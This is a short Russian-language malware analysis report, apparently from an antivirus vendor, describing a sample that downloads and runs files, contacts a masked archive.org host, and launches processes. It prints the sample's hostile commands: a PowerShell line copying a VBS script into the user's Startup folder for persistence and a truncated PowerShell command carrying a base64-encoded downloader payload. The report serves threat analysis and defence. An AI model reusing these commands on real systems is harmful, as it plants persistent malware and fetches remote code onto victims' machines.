Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Сетевая активность
Подключается к
- 'ia#####2.us.archive.org':443
UDP
- DNS ASK ia#####2.us.archive.org
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('<SYSTEM32>\<Имя файла>.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Progra... (со скрытым окном)
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 10
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command [System.IO.File]::Copy('<SYSTEM32>\<Имя файла>.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.omsicilotac.vbs')')
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'LiAoICRzaGVMTGlkWzFdKyRzSGVsTGlEWzEzXSsnWCcpKCgoJ2loTmltYWdlVXJsID0gaW9FaHR0cHM6Ly9pYTYwMDEwMi51cy5hcmNoaXZlLm9yZy8zMi9pdGVtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RldGFoTicrJ290ZV9WL... (со скрытым окном)
